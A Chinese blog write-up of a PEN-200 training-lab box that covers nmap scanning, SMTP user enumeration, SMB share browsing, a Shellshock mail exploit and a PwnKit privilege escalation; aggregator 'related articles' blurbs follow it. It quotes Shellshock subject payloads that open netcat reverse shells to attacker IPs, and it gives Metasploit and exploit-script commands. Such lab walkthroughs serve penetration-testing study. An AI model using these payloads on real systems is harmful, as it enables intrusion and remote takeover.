【pen200-lab】10.11.1.231

news2024/9/23 3:15:01

pen200-lab 学习笔记

【pen200-lab】10.11.1.231


🔥系列专栏:pen200-lab
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月27日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • pen200-lab 学习笔记
    • 信息收集
    • smtp
    • rpc

信息收集

nmap -p- --min-rate 10000 -A 10.11.1.231

22/tcp  open  ssh         OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 b68d1ef380643f8a9652927a9fb1be67 (DSA)
|   2048 72c406a72f711b6a6b57fecfad3f9c16 (RSA)
|_  256 6bc66efbba06dc23f93e01a62a87481a (ECDSA)
25/tcp  open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=localhost.localdomain
| Not valid before: 2013-05-05T06:42:26
|_Not valid after:  2023-05-03T06:42:26
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: mail.local, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
111/tcp open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SECURITY)
445/tcp open  netbios-ssn Samba smbd 4.2.10-Debian (workgroup: SECURITY)

鉴于它存在samba的版本问题,我将首先尝试已知方法

use exploit/linux/samba/is_known_pipename
set rhoat[靶机ip]
run
shell
id

他也许不能成功,所以我也不会放弃smb枚举
在这里插入图片描述是的,它无法成功,因为smb没有公开共享
而这个漏洞的利用条件就是需要一个共享目录可读可写

所以目前我将从rpc以及smtp中尝试枚举到一些信息
如果我获得一些凭据,使我在smb中拥有可读写目录时,我会继续尝试攻击

smtp

nmap --script smtp-enum-users 10.11.1.231

22/tcp  open  ssh
25/tcp  open  smtp
| smtp-enum-users: 
|_  Method RCPT returned a unhandled status code.
111/tcp open  rpcbind
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

或者

smtp-user-enum -M VRFY -U [字典] -t 192.168.247.151
-M    ---用于猜测用户名 EXPN、VRFY 或 RCPT 的方法(默认值:VRFY)
-U    ---通过 smtp 服务检查的用户名文件
-t    ---host 服务器主机运行 smtp 服务
字典是这个,也可以选取类似:
/usr/share/metasploit-framework/data/wordlists/unix_users.txt

得到了下面的很多用户

######## Scan started at Fri Dec  2 02:12:17 2022 #########
10.11.1.231: avahi exists
10.11.1.231: avahi-autoipd exists
10.11.1.231: backup exists
10.11.1.231: bin exists
10.11.1.231: colord exists
10.11.1.231: daemon exists
10.11.1.231: ftp exists
10.11.1.231: games exists
10.11.1.231: gnats exists
10.11.1.231: hplip exists
10.11.1.231: irc exists
10.11.1.231: list exists
10.11.1.231: lp exists
10.11.1.231: mail exists
10.11.1.231: man exists
10.11.1.231: messagebus exists
10.11.1.231: news exists
10.11.1.231: nobody exists
10.11.1.231: postfix exists
10.11.1.231: postmaster exists
10.11.1.231: proxy exists
10.11.1.231: root exists
10.11.1.231: ROOT exists
10.11.1.231: saned exists
10.11.1.231: sshd exists
10.11.1.231: sync exists
10.11.1.231: sys exists
10.11.1.231: systemd-bus-proxy exists
10.11.1.231: systemd-timesync exists
10.11.1.231: systemd-resolve exists
10.11.1.231: systemd-network exists
10.11.1.231: uucp exists
10.11.1.231: uuidd exists
10.11.1.231: webmaster exists
10.11.1.231: www exists
10.11.1.231: www-data exists
######## Scan completed at Fri Dec  2 02:12:58 2022 #########

rpc

在这里插入图片描述
同样没有枚举出任何东西
仅仅存在空绑定

到目前为止,我将继续仔细搜索smb的漏洞,也许与上次的有所不同
在这里插入图片描述

得到的结果依旧是2017-7494

我还是要试试
首先我探索空绑定

smbclient -N -L //10.11.1.231

我很好奇为什么smbmap这里什么都没有
在这里插入图片描述于是我又尝试了一下smbmap
在这里插入图片描述

非常诧异
我将在tmp下继续枚举

smbclient -N //10.11.1.231/tmp 

在这里插入图片描述
在这里插入图片描述
查看其他的两个共享目录
在这里插入图片描述docs以及home全是空文件
不过docs看起来是一个文件
home全是user
又可能这是用户列表
user1-9 以及useradm

在这里插入图片描述到目前为止,我们具有很多的用户,但是没有密码

接着我在smb中枚举,发现了log文件,其中有意思的信息有下面两条,这很敏感的将我指引到了shellshock

FROM= useradm@mail.local"
"SUBJECT=() { :; };/bin/nc 192.168.119.221 4444 -e /bin/sh;"

Subject:() { :; };/bin/nc 192.168.119.123 1234 -e /bin/sh;

我将在这里找到exp

https://gist.github.com/YSSVirus/0978adadbb8827b53065575bb8fbcb25

而后如此利用
就可以获得一个shell
而后我进行linpeas.sh枚举

python2 exp.py 10.11.1.231 useradm@mail.local 192.168.119.175 1234 useradm@mail.local

在这里插入图片描述

https://github.com/c3c/CVE-2021-4034

在这里找到对应版本即可
而后上传赋权利用即可

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/57530.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Metabase学习教程:系统管理-2

数据共享指南 在组织内部或外部,共享数据或分析的选项是什么?何时应该使用一种方法而不是另一种方法? 你有数据,你想(或被要求)分享它。这些数据是一个问题还是一个访问多个数据库完整的问题数据资料室&a…

SpringCloud - Sentinel熔断与限流

文章目录一.Sentinel下载安装运行二.Sentinel初始化监控三.流控规则1. 阈值类型1.1 QPS1.2 线程数2. 流控模式2.1 直接2.2 关联2.3 链路3. 流控效果3.1 快速失败3.2 WarmUp预热3.3 排队等待四.降级规则1. RT2. 异常比例3. 异常数五.Sentinel 热点key1. 基本使用2. 参数例外项六…

Spring Data JPA - Web 支持、排序和分页

在前面的教程中,我们已经看到了如何使用 Spring Data 分页 Web 支持。在本教程中,我们将了解如何使用排序支持。 在基于 Web 的应用程序中应用排序主要有两种方法: 按可分页处理程序参数排序 我们在前面的示例中使用过,但没有任…

【经验】Word 2021|如何在Word里做出和Markdown中一样漂亮的引用样式(结尾附成品)

文章目录写在最前方法以及参数1 打开样式窗口2 设置一些基本操作3 打开格式窗口4 修改样式最后一步!保持间隔成品的介绍(一些自卖自夸)获取链接(不想看做法的话直接下载)写在最前 Word 版本:2021 这个文章是…

[附源码]JAVA毕业设计技术的游戏交易平台(系统+LW)

[附源码]JAVA毕业设计技术的游戏交易平台(系统LW) 目运行 环境项配置: Jdk1.8 Tomcat8.5 Mysql HBuilderX(Webstorm也行) Eclispe(IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持)。 项目技…

Python使用GARCH,EGARCH,GJR-GARCH模型和蒙特卡洛模拟进行股价预测

全文下载链接:http://tecdat.cn/?p20678在本文中,预测股价已经受到了投资者,政府,企业和学者广泛的关注。然而,数据的非线性和非平稳性使得开发预测模型成为一项复杂而具有挑战性的任务(点击文末“阅读原文…

HTML+CSS个人电影网页设计——电影从你的全世界路过(4页)带音乐特效

HTML实例网页代码, 本实例适合于初学HTML的同学。该实例里面有设置了css的样式设置,有div的样式格局,这个实例比较全面,有助于同学的学习,本文将介绍如何通过从头开始设计个人网站并将其转换为代码的过程来实践设计。 文章目录一、网页介绍一…

期末测试——H5方式练习题

期末考试——H5完成方式——练习题 前言 本练习训练了孩子们的栅格化布局,H5标签,CSS样式,并对列表与菜单进行了强化训练。使孩子们更好的掌握H5布局,为后面的框架教学打好基础。 素材下载地址: 链接:htt…

【学习记录】Dynaslam源代码魔改-替换MaskRCNN为YoloV5

这两天接了个小任务,需求是替换Dynaslam里面的动态物体识别模块,将MaskRCNN换为YoloV5,这里记录一下过程中遇见的问题。 一、运行Dynaslam Dynaslam本身是一个基于ORBSLAM2的视觉SLAM框架,论文并没有仔细看过,简单来…

HTML5期末大作业:基于html+css+javascript+jquery实现藏族文化15页【学生网页设计作业源码】

🎉精彩专栏推荐 💭文末获取联系 ✍️ 作者简介: 一个热爱把逻辑思维转变为代码的技术博主 💂 作者主页: 【主页——🚀获取更多优质源码】 🎓 web前端期末大作业: 【📚毕设项目精品实战案例 (10…

免费搜索vs付费搜索:百度谷歌的有力竞争者刚刚出现!

北大出版社,人工智能原理与实践 人工智能和数据科学从入门到精通 详解机器学习深度学习算法原理 人工智能原理与实践 全面涵盖人工智能和数据科学各个重要体系经典 搜索引擎的游戏刚刚被改变! 人们对昨天(12月1号)OpenAI 发布…

UltraISO 制作U盘启动盘

1、 从Ubuntu官网http://cn.ubuntu.com/download/下载系统的iso文件 用来制作的U盘需要是FAT32格式的,可以通过格式化U盘更改(注意,如果U盘已经写入过隐藏分区了,需要在磁盘管理里面删除相关隐藏分区然后合并为一个大分区后…

[附源码]Python计算机毕业设计Django基于协同过滤的资讯推送平台

项目运行 环境配置: Pychram社区版 python3.7.7 Mysql5.7 HBuilderXlist pipNavicat11Djangonodejs。 项目技术: django python Vue 等等组成,B/S模式 pychram管理等等。 环境需要 1.运行环境:最好是python3.7.7,…

MyBatis动态SQL多表操作

动态SQL if-where标签 <select id"selByCondition" resultMap"rm">select *from mybatis<where><if test"status !null">and STATUS#{STATUS}</if><if test"companyName !null and companyName !">an…

idea10个常用的Debug技巧

文章目录一 回到上一步二 字段断点三 Stream调试四 表达式结果查看五 debug筛选条件六 异常断点七 远程调试八 强制返回九 运行时修改变量十 多线程调试重用快捷键一 回到上一步 进行代码调试的过程中&#xff0c;有的时候由于自己点击下一步的速度比较快&#xff0c;可能之前…

世界连续动作预测模型-方向模型

🍿*★,*:.☆欢迎您/$:*.★* 🍿 正文 <

[附源码]Python计算机毕业设计Django基于java的社区管理系统

项目运行 环境配置&#xff1a; Pychram社区版 python3.7.7 Mysql5.7 HBuilderXlist pipNavicat11Djangonodejs。 项目技术&#xff1a; django python Vue 等等组成&#xff0c;B/S模式 pychram管理等等。 环境需要 1.运行环境&#xff1a;最好是python3.7.7&#xff0c;…

云原生k8s的金箍棒

如果云原生是我们喜欢的《西游记》中孙悟空&#xff0c;那Autoscaling就是云原生手中的金箍棒。想象一下&#xff0c;没有金箍棒的孙悟空&#xff0c;还能到处降妖伏魔么&#xff1f;还能成为斗战圣佛吗&#xff1f; Autoscaling 根据需要随时动态扩缩容&#xff0c;有了它&…

TsingHua:FPT: Improving Prompt Tuning Efficiency via Progressive Training

这篇文章我觉得做的也挺有意思的。 是在探究提示学习中渐进式的更新参数比一窝蜂的直接更新参数效果要佳。 开头 是从比较PT&#xff08;prompt learning和fine tuning&#xff09;开始的。为什么PT的收敛速度慢&#xff0c;训练效率低下&#xff1f; 因为PT中中可训练的参数…

[附源码]计算机毕业设计新冠疫苗接种预约系统Springboot程序

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…